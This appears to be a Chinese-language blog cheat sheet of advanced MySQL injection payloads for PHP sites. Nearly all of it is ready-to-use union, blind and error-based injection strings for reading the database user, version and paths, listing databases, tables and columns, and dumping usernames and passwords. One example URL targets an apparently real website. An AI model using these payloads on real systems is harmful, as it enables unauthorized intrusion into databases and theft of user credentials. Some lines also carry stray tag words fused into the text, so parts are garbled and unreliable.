php mysql 经常使用高级注入语句

时间 2020-11-19 标签 php mysql web sql 数据库浏览器 session ide 函数编码

盲注查询：php

and (select count(*) from mysql.user)>0/* 查看权限mysql

1:system_user() 系统用户名web

2:user() 用户名sql

3:current_user 当前用户名数据库

4:session_user()链接数据库的用户名浏览器

5:database() 数据库名session

6:version() MYSQL数据库版本ide

7:load_file() MYSQL读取本地文件的函数函数

8:@@datadir 读取数据库路径编码

9:@@basedir MYSQL 安装路径

10:@@version_compile_os 操做系统 Windows Server 2003,

############################################################################################################

查看用户和密码：

http://www.fly-er.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12+from+mysql.user

查看有多少列：select 。。。 from information_schema.SCHEMATA–

查询当前用户:

Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r

and(0)*2))x+from+information_schema.tables+group+by+x)a)

用户数据库名称数据库版本：

and+substring(@@version,1,1)=4

and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13/*

有时加上“/*” 会报错，因此此时须要去掉“/*”

######################################### 暴库 ######################################################

and 1=2 union select 1,2,SCHEMA_NAME,4,5,6,7,8,9,10,11 from information_schema.SCHEMATA limit 1,1/*

其中“limit 1,1” 中前面的数字“1”能够增长来查看多个库（有时加上“/*” 会报错，因此此时须要去掉“/*”）

暴全部库：

+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+table_schema)),5,6,7,8+from+information_schema.columns

读出全部库:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“LIMIT 0,1” 此处的0可看多个库

爆当前数据库

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

查询当前数据库:

Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo

or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

####################################################################################################################################################################################################################################################################################################################################

#################################### 快速爆表 #####################################################

爆全部表

and+1=2+union+select+1,group_concat(distinct+table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()

爆全部表

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9,10,11,12+from+information_schema.tables+where+table_schema=0x666C6965725F6462617365 或者=（ database() ）也行

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*

有时加上“/*” 会报错，因此此时须要去掉“/*”

+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.tables+where+table_schema=0x697266+order+by+table_schema+limit+0,1)t+limit+1--

注：“table_schema=0x697266” 为上面查到的库的hex值且“limit+0,1)”中的0可一直增长查看多个表

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x70726F64756374 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“table_schema”后面的 “limit 0,1”中的0可爆多个表

############################################## 快速暴字段 ########################################

and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8 from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*

limit 从0开始递增，查询到时浏览器返回错误，说明此表存在N-1个字段。

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+column_name),8,9,10,11,12+from+information_schema.columns+where+table_name=0x7075625F7765626D6173746572

读出全部表字段:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)

*/ (97,100,109,105,110)为admin的ascii码依次类推

and+1=2+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.columns+where+table_name=爆出来的表名的hex值+and+table_schema=数据库名的hex值+order+by+1+limit+0,1)t+limit+1--

注：其中“limit+0,1)”中的0能够一直增长来查看多个字段

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“table_name”后面的“limit 0,1”可爆多个字段

################################# 查看字段内容： #############################################

and+1=2+union+select+1,2,3,concat(md_pw),5,6,7,8,9,10,11,12,13+from+MemberData

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+username,0x5f,userpwd),8,9,10,11,12+from+pub_webmaster

and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*

union select 1,group_concat(username,0x3a,password),3,4,5... from 表（或表的hex值）

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1